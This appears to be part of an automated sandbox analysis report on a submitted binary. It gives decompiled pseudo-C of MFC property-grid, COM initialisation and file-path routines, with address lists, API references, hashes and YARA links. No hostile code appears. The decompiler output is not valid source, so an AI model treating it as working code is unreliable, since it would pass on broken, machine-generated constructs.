				signed int _t196;
				signed int _t200;
				void* _t210;

				_t210 = __fp0;
				_t182 = __esi;
				_t174 = __edx;
				_t142 = __ebx;
				_t196 = _t200;
				_t78 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t78 ^ _t196;
				_push(__ebx);
				_v28 = _a8;
				_t81 = _a4;
				_push(__edi);
				_t177 = __ecx;
				if(_t81 == 0) {
					E00CAA4E7(__ebx, __ecx, __ecx, __esi, __eflags);
					asm("int3");
					_push(_t196);
					_t83 = _v80;
					_t175 = __ecx;
					__eflags = _t83;
					if(__eflags == 0) {
						E00CAA4E7(__ebx, __ecx, __ecx, __esi, __eflags);
						asm("int3");
						_push(0x24);
						E00DDD52C(0xe09cbf, _t142, __ecx, __esi);
						_t183 = __ecx;
						E00CA67E1( &_v28);
						_v24.bottom = 0;
						E00CC1628(_a4,  &_v28, _v0);
						_push(_v28);
						E00D0EB00(_t142,  &_v56, 0, _t183, __eflags);
						_push( &_v32);
						_push("MFCPropertyGrid_DescriptionArea");
						_push( &_v56);
						_v24.bottom = 1;
						_v32 = 1;
						__eflags = E00D1034D(1, 0, _t183, __eflags);
						if(__eflags != 0) {
							E00CCDA61(_t183, _v32);
						}
						E00CA67E1( &_v24);
						_push(0);
						_v24.bottom = 2;
						_push( &_v24);
						_push("MFCPropertyGrid_DescriptionRows");
						__eflags = E00D0EB78(1,  &_v56, 0, _t183, __eflags);
						if(__eflags != 0) {
							_t117 = _v24.left;
							__eflags =  *(_v24.left - 0xc);
							if(__eflags != 0) {
								__eflags = E00DE7BE1( &_v56, _t117);
								if(__eflags >= 0) {
									E00CD18A0(_t183, _t118);
								}
							}
						}
						_v36 = 1;
						_push( &_v36);
						_push("MFCPropertyGrid_HeaderCtrl");
						_push( &_v56);
						__eflags = E00D1034D(1, 0, _t183, __eflags);
						if(__eflags != 0) {
							_push("Value");
							E00CCDAA3(_t183, _v36, "Property");
						}
						_v40 = 0;
						_push( &_v40);
						_push("MFCPropertyGrid_AlphabeticMode");
						_push( &_v56);
						__eflags = E00D1034D(1, 0, _t183, __eflags);
						if(__eflags != 0) {
							E00CD14E1(_t183, _t175, _t210, _v40);
						}
						_v44 = 1;
						_push( &_v44);
						_push("MFCPropertyGrid_ModifiedProperties");
						_push( &_v56);
						__eflags = E00D1034D(1, 0, _t183, __eflags);
						if(__eflags != 0) {
							E00CCE373(_t183, _v44, 1);
						}
						_v48 = 1;
						_push( &_v48);
						_push("MFCPropertyGrid_VSDotNetLook");
						_push( &_v56);
						_t108 = E00D1034D(1, 0, _t183, __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							_t108 = E00CD1BE4(_t183, _v48);
						}
						E00CA2975(E00D0EB37(E00CA2975(_t108, _v24.left - 0x10),  &_v56), _v28 - 0x10);
						__eflags = 0;
						return E00DDD4FA(0);
					} else {
						_t166 =  *((intOrPtr*)(__ecx + 0x330)) -  *((intOrPtr*)(__ecx + 0x328));
						_push(__esi);
						_push(__ecx);
						_t179 =  *((intOrPtr*)(_t83 + 0x14));
						_t184 =  *((intOrPtr*)(_t179 + 4));
						__eflags = _t184 - _t166;
						if(__eflags >= 0) {
							_t184 = _t166;
						}
						 *((intOrPtr*)(_t179 + 4)) = _t184;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x14)) + 4)));
						E00CD1D16(_t142, _t175, _t175, _t179, _t184, __eflags);
						_t123 = _a4;
						 *_t123 =  *_t123 & 0x00000000;
						__eflags =  *_t123;
						return _t123;
					}
				} else {
					_t145 = 0;
					if( *((intOrPtr*)(_t81 + 0xc)) == 0) {
						_v76 = 1;
						 *0xe17a64(__esi);
						SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x164))))() + 0x20), 0x1203, 0,  &_v76);
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetClientRect( *(_t177 + 0x20),  &_v24);
						_t147 =  *(_t177 + 0x354);
						_t133 = _v72 + 0xfffffffe;
						if(_t147 <= _t133) {
							_t147 = _t133;
						}
						if(_t147 >= _v24.right - _v24.left - GetSystemMetrics(0x15) - 5) {
							_t194 = _v24.right - _v24.left - GetSystemMetrics(0x15) - 5;
							__eflags = _t194;
						} else {
							_t194 =  *(_t177 + 0x354);
							_t141 = _v72 + 0xfffffffe;
							_t207 = _t194 - _t141;
							if(_t194 <= _t141) {
								_t194 = _t141;
							}
						}
						 *(_t177 + 0x358) = _t194;
						E00CD122D(_t177, _t174, _t207, _t210);
						InvalidateRect( *(_t177 + 0x20), _t177 + 0x328, 1);
						UpdateWindow( *(_t177 + 0x20));
						_t145 = 0;
						_pop(_t182);
					}
					_pop(_t181);
					 *_v28 = _t145;
					_pop(_t146);
					return E00DDCBCE(_v28, _t146, _v8 ^ _t196, _t174, _t181, _t182);
				}
			}

0x00ccf150
0x00ccf150
0x00ccf150
0x00ccf150
0x00ccf151
0x00ccf156
0x00ccf15d
0x00ccf163
0x00ccf164
0x00ccf167
0x00ccf16a
0x00ccf16b
0x00ccf16f
0x00ccf258
0x00ccf25d
0x00ccf25e
0x00ccf261
0x00ccf264
0x00ccf266
0x00ccf268
0x00ccf2a0
0x00ccf2a5
0x00ccf2a6
0x00ccf2ad
0x00ccf2b2
0x00ccf2b7
0x00ccf2c8
0x00ccf2cb
0x00ccf2d0
0x00ccf2d6
0x00ccf2e0
0x00ccf2e1
0x00ccf2ea
0x00ccf2eb
0x00ccf2ee
0x00ccf2f6
0x00ccf2f8
0x00ccf2ff
0x00ccf2ff
0x00ccf307
0x00ccf30c
0x00ccf310
0x00ccf314
0x00ccf315
0x00ccf322
0x00ccf324
0x00ccf326
0x00ccf329
0x00ccf32c
0x00ccf335
0x00ccf337
0x00ccf33c
0x00ccf33c
0x00ccf337
0x00ccf32c
0x00ccf344
0x00ccf347
0x00ccf348
0x00ccf350
0x00ccf356
0x00ccf358
0x00ccf35a
0x00ccf369
0x00ccf369
0x00ccf371
0x00ccf374
0x00ccf375
0x00ccf37d
0x00ccf383
0x00ccf385
0x00ccf38c
0x00ccf38c
0x00ccf394
0x00ccf397
0x00ccf398
0x00ccf3a0
0x00ccf3a6
0x00ccf3a8
0x00ccf3b0
0x00ccf3b0
0x00ccf3b8
0x00ccf3bb
0x00ccf3bc
0x00ccf3c4
0x00ccf3c5
0x00ccf3ca
0x00ccf3cc
0x00ccf3d3
0x00ccf3d3
0x00ccf3f1
0x00ccf3f6
0x00ccf3fd
0x00ccf26a
0x00ccf270
0x00ccf276
0x00ccf277
0x00ccf278
0x00ccf27b
0x00ccf27e
0x00ccf280
0x00ccf282
0x00ccf282
0x00ccf284
0x00ccf28c
0x00ccf28f
0x00ccf294
0x00ccf299
0x00ccf299
0x00ccf29d
0x00ccf29d
0x00ccf175
0x00ccf175
0x00ccf17a
0x00ccf183
0x00ccf192
0x00ccf1a9
0x00ccf1b2
0x00ccf1b9
0x00ccf1bc
0x00ccf1bf
0x00ccf1c2
0x00ccf1cb
0x00ccf1d1
0x00ccf1d6
0x00ccf1d8
0x00ccf1d8
0x00ccf1ef
0x00ccf215
0x00ccf215
0x00ccf1f1
0x00ccf1f4
0x00ccf1fa
0x00ccf1fd
0x00ccf1ff
0x00ccf201
0x00ccf201
0x00ccf1ff
0x00ccf21a
0x00ccf220
0x00ccf231
0x00ccf23a
0x00ccf240
0x00ccf242
0x00ccf242
0x00ccf249
0x00ccf24c
0x00ccf24e
0x00ccf255
0x00ccf255

APIs

SendMessageA.USER32(?,00001203,00000000,00000001), ref: 00CCF1A9
GetClientRect.USER32(?,?), ref: 00CCF1C2
GetSystemMetrics.USER32 ref: 00CCF1E2
GetSystemMetrics.USER32 ref: 00CCF20D

Part of subcall function 00D1034D: __EH_prolog3.LIBCMT ref: 00D10354

Part of subcall function 00CD14E1: RedrawWindow.USER32(?,00000000,00000000,00000105,?,00000000,00000001,00000001,00000000,?,00CCF391,?,?,MFCPropertyGrid_AlphabeticMode,?,?), ref: 00CD153C

InvalidateRect.USER32(?,?,00000001), ref: 00CCF231
UpdateWindow.USER32(?), ref: 00CCF23A
__EH_prolog3.LIBCMT ref: 00CCF2AD

Strings

MFCPropertyGrid_DescriptionRows, xrefs: 00CCF315
MFCPropertyGrid_AlphabeticMode, xrefs: 00CCF375
MFCPropertyGrid_HeaderCtrl, xrefs: 00CCF348
MFCPropertyGrid_ModifiedProperties, xrefs: 00CCF398
MFCPropertyGrid_DescriptionArea, xrefs: 00CCF2E1
Value, xrefs: 00CCF35A
Property, xrefs: 00CCF35F
MFCPropertyGrid_VSDotNetLook, xrefs: 00CCF3BC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3MetricsRectSystemWindow$ClientInvalidateMessageRedrawSendUpdate
String ID: MFCPropertyGrid_AlphabeticMode$MFCPropertyGrid_DescriptionArea$MFCPropertyGrid_DescriptionRows$MFCPropertyGrid_HeaderCtrl$MFCPropertyGrid_ModifiedProperties$MFCPropertyGrid_VSDotNetLook$Property$Value
API String ID: 1592221277-2695045869
Opcode ID: 82cb198eac19843e8e090f0061348a992e92ef7b9ed740adb0a6f156e2cd64d6
Instruction ID: 063ea5199b6e1c3234915d12582275bede7df6a2fcb18463d125de888e9c42a8
Opcode Fuzzy Hash: 82cb198eac19843e8e090f0061348a992e92ef7b9ed740adb0a6f156e2cd64d6
Instruction Fuzzy Hash: 4F815E71A00219AFDF04EFA4DD85DEEBBB9FF08314B044129E815A7291DB70AE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2303 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA230A
CoInitializeEx.OLE32(00000000,00000000,00000078,8007000E), ref: 00CA2322
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00CA2348
CoUninitialize.OLE32 ref: 00CA235F

Strings

Error, xrefs: 00CA232D, 00CA2387, 00CA2441, 00CA248E
CoInitializeSecurity failed: %x, xrefs: 00CA2353

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Initialize$H_prolog3SecurityUninitialize
String ID: CoInitializeSecurity failed: %x$Error
API String ID: 1444887985-3687656001
Opcode ID: 38409b7fa584ddba1eafdb08b2f3527b9edf39d9c99d927bd1ec6628f2fdf4db
Instruction ID: 2df54e118c04585434bc2e1b3365e1b5fb04f92ed34c9c50fd8b5160fc74e662
Opcode Fuzzy Hash: 38409b7fa584ddba1eafdb08b2f3527b9edf39d9c99d927bd1ec6628f2fdf4db
Instruction Fuzzy Hash: 5F418232A40626AFCB01EFA5DD45ADF7B7AAF47714F204104B905BB190D6B1AB058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC44D7 Relevance: 26.0, APIs: 17, Instructions: 466
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CC44D7(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t207;
				void* _t212;
				char* _t217;
				char* _t219;
				intOrPtr* _t238;
				intOrPtr* _t245;
				intOrPtr* _t253;
				intOrPtr* _t259;
				short* _t261;
				intOrPtr* _t262;
				short* _t264;
				intOrPtr* _t265;
				signed int _t270;
				intOrPtr _t274;
				short* _t280;
				short* _t281;
				short* _t285;
				int _t290;
				short* _t292;
				void* _t293;
				int _t303;
				intOrPtr* _t304;
				void* _t308;
				WCHAR* _t310;
				WCHAR* _t334;
				int _t338;
				short* _t355;
				intOrPtr* _t357;
				intOrPtr* _t361;
				intOrPtr* _t365;
				short* _t380;
				intOrPtr* _t383;
				void* _t387;
				signed int _t398;
				intOrPtr* _t403;
				signed int _t407;
				intOrPtr* _t420;
				intOrPtr* _t422;
				short* _t426;
				intOrPtr _t429;
				signed int _t430;
				void* _t431;
				intOrPtr _t433;
				char* _t437;
				short* _t438;
				signed int _t439;
				WCHAR* _t451;
				char* _t452;
				short* _t453;
				char* _t455;
				void* _t460;
				void* _t461;
				signed int _t471;

				_push(0x38);
				_t207 = E00DDD52C(0xe0910e, __ebx, __edi, __esi);
				_t433 = __ecx;
				 *((intOrPtr*)(_t460 - 0x28)) = __ecx;
				if( *((intOrPtr*)(__ecx + 0xac)) == 1) {
					_t426 =  *(__ecx + 0xbc);
					_t441 =  *((intOrPtr*)( *_t426 + 0x50));
					 *0xe17a64(_t426, _t460 - 0x24);
					_t212 =  *((intOrPtr*)( *((intOrPtr*)( *_t426 + 0x50))))();
					_t338 = 0;
					if(_t212 < 0) {
						__eflags =  *( *((intOrPtr*)(__ecx + 0xa8)) + 0x34) & 0x00000200;
						if(__eflags != 0) {
							_t355 =  *(__ecx + 0xbc);
							 *((intOrPtr*)(_t460 - 0x34)) = 0;
							_t441 =  *( *_t355);
							 *0xe17a64(_t355, 0xe1b2b0, _t460 - 0x34);
							__eflags =  *((intOrPtr*)( *( *_t355)))();
							if(__eflags >= 0) {
								_t357 =  *((intOrPtr*)(_t460 - 0x34));
								 *((intOrPtr*)(_t460 - 0x30)) = 0;
								 *0xe17a64(_t357, _t460 - 0x30);
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t357 + 0x6c))))();
								if(__eflags >= 0) {
									_t361 =  *((intOrPtr*)(_t460 - 0x30));
									 *0xe17a64(_t361, _t460 - 0x2c);
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t361 + 0x24))))();
									if(__eflags >= 0) {
										_t365 =  *((intOrPtr*)(_t460 - 0x2c));
										 *((intOrPtr*)(_t460 - 0x40)) = 0;
										 *0xe17a64(_t365, 1, _t460 - 0x20, _t460 - 0x40);
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t365 + 0xc))))();
										if(__eflags == 0) {
											E00CA96B5(_t460 - 0x10);
											 *(_t460 - 4) = 1;
											 *(_t460 - 0x18) =  *( *((intOrPtr*)(__ecx + 0xa8)) + 0x1c);
											_t259 =  *((intOrPtr*)(_t460 - 0x20));
											 *(_t460 - 0x14) = 0;
											 *0xe17a64(_t259, 0x80058000, _t460 - 0x14);
											_t261 =  *((intOrPtr*)( *((intOrPtr*)( *_t259 + 0x14))))();
											__eflags = _t261;
											if(_t261 >= 0) {
												PathRemoveFileSpecW( *(_t460 - 0x14));
												_t452 =  *(_t460 - 0x18);
												_t303 = WideCharToMultiByte(0, 0,  *(_t460 - 0x14), 0xffffffff, _t452,  *((intOrPtr*)( *((intOrPtr*)(_t433 + 0xa8)) + 0x20)) - 1, 0, 0);
												_t453 =  &(_t452[_t303]);
												__eflags = _t453;
												 *(_t460 - 0x18) = _t453;
												__imp__CoTaskMemFree( *(_t460 - 0x14));
											}
											_t451 =  *(_t460 - 0x10);
											do {
												_t262 =  *((intOrPtr*)(_t460 - 0x20));
												 *(_t460 - 0x14) = _t338;
												_t434 =  *( *_t262 + 0x14);
												 *0xe17a64(_t262, 0x80058000, _t460 - 0x14);
												_t264 =  *( *( *_t262 + 0x14))();
												__eflags = _t264;
												if(_t264 >= 0) {
													_t281 =  *(_t460 - 0x14);
													 *(_t460 - 0x3c) = _t281;
													__eflags = _t281;
													if(_t281 == 0) {
														L28:
														E00CA9C7E(_t460 - 0x10);
														_t451 =  *(_t460 - 0x10);
													} else {
														_t292 = E00DEB04D(_t281);
														 *(_t460 - 0x38) = _t292;
														__eflags = _t292;
														if(_t292 == 0) {
															goto L28;
														} else {
															_t439 =  *(_t451 - 0xc);
															 *(_t460 - 0x44) =  *(_t460 - 0x3c) - _t451 >> 1;
															_t293 = E00CA9EF4(_t338, _t460 - 0x10, _t439, _t292);
															_t398 =  *(_t460 - 0x44);
															_t431 = _t293;
															_t451 =  *(_t460 - 0x10);
															__eflags = _t398 - _t439;
															_t434 =  *(_t460 - 0x38);
															if(_t398 > _t439) {
																E00CAA41B(_t431,  *((intOrPtr*)(_t451 - 8)) +  *((intOrPtr*)(_t451 - 8)),  *(_t460 - 0x3c), _t434 + _t434);
															} else {
																E00CAAB2F(_t451, _t431,  *((intOrPtr*)(_t451 - 8)), _t431 + _t398 * 2, _t434);
															}
															_t461 = _t461 + 0x10;
															_push(_t434);
															E00CA9FC8(_t338, _t460 - 0x10, _t434, _t451);
														}
													}
													__eflags =  *((intOrPtr*)(_t451 - 4)) - 1;
													if( *((intOrPtr*)(_t451 - 4)) > 1) {
														E00CA9CF2(_t338, _t460 - 0x10, _t434, _t451,  *(_t451 - 0xc));
														_t451 =  *(_t460 - 0x10);
													}
													PathRemoveFileSpecW(_t451);
													E00CAD243(_t338, _t460 - 0x10, _t434, 0xffffffff);
													_t430 =  *(_t451 - 0xc);
													_t285 =  *(_t460 - 0x14);
													_t387 = 0x5c;
													__eflags = _t285[_t430] - _t387;
													if(_t285[_t430] == _t387) {
														_t430 = _t430 + 1;
														__eflags = _t430;
													}
													_t437 =  *(_t460 - 0x18);
													_t290 = WideCharToMultiByte(_t338, _t338,  &(( *(_t460 - 0x14))[_t430]), 0xffffffff, _t437,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t460 - 0x28)) + 0xa8)) + 0x20)) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t460 - 0x28)) + 0xa8)) + 0x1c)) - _t437 - 1, _t338, _t338);
													_t438 =  &(_t437[_t290]);
													__eflags = _t438;
													 *(_t460 - 0x18) = _t438;
													__imp__CoTaskMemFree( *(_t460 - 0x14));
												}
												_t265 =  *((intOrPtr*)(_t460 - 0x20));
												 *0xe17a64(_t265);
												 *((intOrPtr*)( *((intOrPtr*)( *_t265 + 8))))();
												_t433 =  *((intOrPtr*)(_t460 - 0x28));
												_t429 =  *((intOrPtr*)(_t433 + 0xa8));
												_t380 =  *(_t460 - 0x18);
												__eflags = _t380 -  *(_t429 + 0x1c) +  *(_t429 + 0x20) - 1;
												if(_t380 <  *(_t429 + 0x1c) +  *(_t429 + 0x20) - 1) {
													goto L35;
												}
												L37:
												_t270 =  *(_t429 + 0x20);
												_t426 =  *(_t429 + 0x1c);
												 *(_t460 - 0x44) = _t270;
												_t272 = _t270 - 1 + _t426;
												__eflags = _t380 - _t270 - 1 + _t426;
												if(_t380 >= _t270 - 1 + _t426) {
													 *(_t426 +  *(_t460 - 0x44) - 2) = _t338;
													_t274 =  *((intOrPtr*)(_t433 + 0xa8));
													_t272 =  *((intOrPtr*)(_t274 + 0x1c));
													 *( *((intOrPtr*)(_t274 + 0x20)) +  *((intOrPtr*)(_t274 + 0x1c)) - 1) = _t338;
												} else {
													 *_t380 = _t338;
												}
												_t170 = _t460 - 4;
												 *_t170 =  *(_t460 - 4) | 0xffffffff;
												__eflags =  *_t170;
												E00CA2975(_t272, _t451 - 0x10);
												goto L41;
												L35:
												_t383 =  *((intOrPtr*)(_t460 - 0x2c));
												 *0xe17a64(_t383, 1, _t460 - 0x20, _t460 - 0x40);
												_t280 =  *((intOrPtr*)( *((intOrPtr*)( *_t383 + 0xc))))();
												__eflags = _t280;
											} while (_t280 == 0);
											_t433 =  *((intOrPtr*)(_t460 - 0x28));
											_t380 =  *(_t460 - 0x18);
											_t429 =  *((intOrPtr*)(_t433 + 0xa8));
											goto L37;
										}
										L41:
										_t253 =  *((intOrPtr*)(_t460 - 0x2c));
										 *0xe17a64(_t253);
										 *((intOrPtr*)( *((intOrPtr*)( *_t253 + 8))))();
									}
									_t245 =  *((intOrPtr*)(_t460 - 0x30));
									 *0xe17a64(_t245);
									 *((intOrPtr*)( *((intOrPtr*)( *_t245 + 8))))();
								}
								_t238 =  *((intOrPtr*)(_t460 - 0x34));
								goto L44;
							}
						}
					} else {
						_t304 = E00CC3CA5();
						 *((intOrPtr*)(_t460 - 0x34)) = _t304;
						if(_t304 != 0) {
							 *(_t460 - 0x10) = 0;
							 *0xe17a64(_t304, _t460 - 0x10);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t304 + 0x78))))() >= 0) {
								_t422 =  *((intOrPtr*)(_t460 - 0x34));
								 *0xe17a64(_t422,  *((intOrPtr*)(_t460 - 0x24)),  *(_t460 - 0x10),  *((intOrPtr*)(__ecx + 0x20)), 0);
								 *((intOrPtr*)( *((intOrPtr*)( *_t422 + 0x7c))))();
								_t334 =  *(_t460 - 0x10);
								 *0xe17a64(_t334);
								 *((intOrPtr*)( *((intOrPtr*)( *_t334 + 8))))();
							}
							_t420 =  *((intOrPtr*)(_t460 - 0x34));
							 *0xe17a64(_t420);
							 *((intOrPtr*)( *((intOrPtr*)( *_t420 + 8))))();
						}
						_t403 =  *((intOrPtr*)(_t460 - 0x24));
						 *(_t460 - 0x18) = _t338;
						_t454 =  *((intOrPtr*)( *_t403 + 0x14));
						 *0xe17a64(_t403, 0x80058000, _t460 - 0x18);
						_t308 =  *((intOrPtr*)( *((intOrPtr*)( *_t403 + 0x14))))();
						_t467 = _t308;
						if(_t308 >= 0) {
							_push( *(_t460 - 0x18));
							E00CC30A3(_t338, _t460 - 0x10, _t433, _t454, _t467);
							_t310 =  *(_t460 - 0x10);
							 *(_t460 - 4) = _t338;
							if( *((intOrPtr*)(_t310 - 4)) > 1) {
								E00CA9CF2(_t338, _t460 - 0x10, _t433, _t454,  *((intOrPtr*)(_t310 - 0xc)));
								_t310 =  *(_t460 - 0x10);
							}
							PathRemoveFileSpecW(_t310);
							E00CAD243(_t338, _t460 - 0x10, _t433, 0xffffffff);
							_t426 =  *(_t460 - 0x18);
							_t407 =  *( *(_t460 - 0x10) - 0xc);
							if(_t426[_t407] == 0x5c) {
								_t407 = _t407 + 1;
							}
							WideCharToMultiByte(_t338, _t338,  &(_t426[_t407]), 0xffffffff,  *( *((intOrPtr*)(_t433 + 0xa8)) + 0x24),  *( *((intOrPtr*)(_t433 + 0xa8)) + 0x28), _t338, _t338);
							 *( *( *((intOrPtr*)(_t433 + 0xa8)) + 0x28) +  *( *((intOrPtr*)(_t433 + 0xa8)) + 0x24) - 1) = _t338;
							WideCharToMultiByte(_t338, _t338,  *(_t460 - 0x18), 0xffffffff,  *( *((intOrPtr*)(_t433 + 0xa8)) + 0x1c),  *((intOrPtr*)( *((intOrPtr*)(_t433 + 0xa8)) + 0x20)) - 1, _t338, _t338);
							 *( *((intOrPtr*)( *((intOrPtr*)(_t433 + 0xa8)) + 0x20)) +  *( *((intOrPtr*)(_t433 + 0xa8)) + 0x1c) - 2) = _t338;
							_t455 =  *( *((intOrPtr*)(_t433 + 0xa8)) + 0x1c);
							 *(E00DEC1A0(_t455) +  &(_t455[1])) = _t338;
							__imp__CoTaskMemFree( *(_t460 - 0x18));
							_t62 = _t460 - 4;
							 *_t62 =  *(_t460 - 4) | 0xffffffff;
							_t471 =  *_t62;
							E00CA2975(_t323,  *(_t460 - 0x10) - 0x10);
						}
						_t238 =  *((intOrPtr*)(_t460 - 0x24));
						L44:
						_t441 =  *((intOrPtr*)( *_t238 + 8));
						 *0xe17a64(_t238);
						 *((intOrPtr*)( *((intOrPtr*)( *_t238 + 8))))();
					}
					_push(_t460 - 0x1c);
					E00CC3D16(_t338, _t433, _t426, _t433, _t441, _t471);
					 *(_t460 - 4) = 2;
					E00CA67E1(_t460 - 0x40);
					 *(_t460 - 4) = 3;
					_t217 = PathFindFileNameA( *(_t460 - 0x1c));
					_t442 = _t217;
					if(_t217 != 0) {
						_push(E00DEC1A0(_t442));
						E00CA2CD7(_t338, _t460 - 0x40, _t433, _t442, _t442);
					}
					E00CA67E1(_t460 - 0x3c);
					 *(_t460 - 4) = 4;
					_t219 = PathFindExtensionA( *(_t460 - 0x1c));
					if(_t219 != 0 &&  *_t219 == 0x2e) {
						_t188 =  &(_t219[1]); // 0x1
						_t444 = _t188;
						if(_t188 != 0) {
							_t338 = E00DEC1A0(_t444);
						}
						_push(_t338);
						E00CA2CD7(_t338, _t460 - 0x3c, _t433, _t444, _t444);
					}
					 *((short*)( *((intOrPtr*)(_t433 + 0xa8)) + 0x38)) =  *((intOrPtr*)( *(_t460 - 0x1c) - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(_t460 - 0x40)) - 0xc));
					 *((short*)( *((intOrPtr*)(_t433 + 0xa8)) + 0x3a)) =  *((intOrPtr*)( *(_t460 - 0x1c) - 0xc)) -  *((intOrPtr*)( *(_t460 - 0x3c) - 0xc));
					_t207 = E00CA2975(E00CA2975(E00CA2975( *(_t460 - 0x3c),  *(_t460 - 0x3c) - 0x10),  *((intOrPtr*)(_t460 - 0x40)) - 0x10),  *(_t460 - 0x1c) - 0x10);
				}
				return E00DDD4FA(_t207);
			}

0x00cc44d7
0x00cc44de
0x00cc44e3
0x00cc44e5
0x00cc44ef
0x00cc44f5
0x00cc44fd
0x00cc4507
0x00cc450d
0x00cc450f
0x00cc4513
0x00cc4686
0x00cc468d
0x00cc4693
0x00cc4699
0x00cc469e
0x00cc46ac
0x00cc46b4
0x00cc46b6
0x00cc46bc
0x00cc46bf
0x00cc46ce
0x00cc46d6
0x00cc46d8
0x00cc46de
0x00cc46ed
0x00cc46f5
0x00cc46f7
0x00cc46fd
0x00cc4700
0x00cc4715
0x00cc471d
0x00cc471f
0x00cc4728
0x00cc4733
0x00cc473d
0x00cc4740
0x00cc4743
0x00cc4757
0x00cc475d
0x00cc475f
0x00cc4761
0x00cc4766
0x00cc4772
0x00cc4784
0x00cc478d
0x00cc478d
0x00cc478f
0x00cc4792
0x00cc4792
0x00cc4798
0x00cc479b
0x00cc479b
0x00cc479e
0x00cc47a3
0x00cc47b2
0x00cc47b8
0x00cc47ba
0x00cc47bc
0x00cc47c2
0x00cc47c5
0x00cc47c8
0x00cc47ca
0x00cc4831
0x00cc4834
0x00cc4839
0x00cc47cc
0x00cc47cd
0x00cc47d2
0x00cc47d6
0x00cc47d8
0x00000000
0x00cc47da
0x00cc47dd
0x00cc47e4
0x00cc47eb
0x00cc47f0
0x00cc47f3
0x00cc47f5
0x00cc47f8
0x00cc47fa
0x00cc47fd
0x00cc481e
0x00cc47ff
0x00cc4808
0x00cc4808
0x00cc4823
0x00cc4829
0x00cc482a
0x00cc482a
0x00cc47d8
0x00cc483c
0x00cc4840
0x00cc4848
0x00cc484d
0x00cc484d
0x00cc4851
0x00cc485c
0x00cc4861
0x00cc4864
0x00cc4869
0x00cc486a
0x00cc486e
0x00cc4870
0x00cc4870
0x00cc4870
0x00cc4874
0x00cc4895
0x00cc489e
0x00cc489e
0x00cc48a0
0x00cc48a3
0x00cc48a3
0x00cc48a9
0x00cc48b4
0x00cc48ba
0x00cc48bc
0x00cc48bf
0x00cc48ce
0x00cc48d1
0x00cc48d3
0x00000000
0x00000000
0x00cc4906
0x00cc4906
0x00cc4909
0x00cc490c
0x00cc4910
0x00cc4912
0x00cc4914
0x00cc491d
0x00cc4921
0x00cc492a
0x00cc492d
0x00cc4916
0x00cc4916
0x00cc4916
0x00cc4931
0x00cc4931
0x00cc4931
0x00cc4938
0x00000000
0x00cc48d5
0x00cc48d5
0x00cc48ea
0x00cc48f0
0x00cc48f2
0x00cc48f2
0x00cc48fa
0x00cc48fd
0x00cc4900
0x00000000
0x00cc4900
0x00cc493d
0x00cc493d
0x00cc4948
0x00cc494e
0x00cc494e
0x00cc4950
0x00cc495b
0x00cc4961
0x00cc4961
0x00cc4963
0x00000000
0x00cc4963
0x00cc46b6
0x00cc4519
0x00cc451b
0x00cc4520
0x00cc4525
0x00cc4529
0x00cc4536
0x00cc4540
0x00cc4542
0x00cc4557
0x00cc455d
0x00cc455f
0x00cc456a
0x00cc4570
0x00cc4570
0x00cc4572
0x00cc457d
0x00cc4583
0x00cc4583
0x00cc4585
0x00cc4588
0x00cc458d
0x00cc459c
0x00cc45a2
0x00cc45a4
0x00cc45a6
0x00cc45ac
0x00cc45b2
0x00cc45b7
0x00cc45ba
0x00cc45c1
0x00cc45c9
0x00cc45ce
0x00cc45ce
0x00cc45d2
0x00cc45dd
0x00cc45e5
0x00cc45e8
0x00cc45f0
0x00cc45f2
0x00cc45f2
0x00cc4609
0x00cc461d
0x00cc4636
0x00cc4648
0x00cc4652
0x00cc465c
0x00cc4663
0x00cc466c
0x00cc466c
0x00cc466c
0x00cc4673
0x00cc4673
0x00cc4678
0x00cc4966
0x00cc4969
0x00cc496e
0x00cc4974
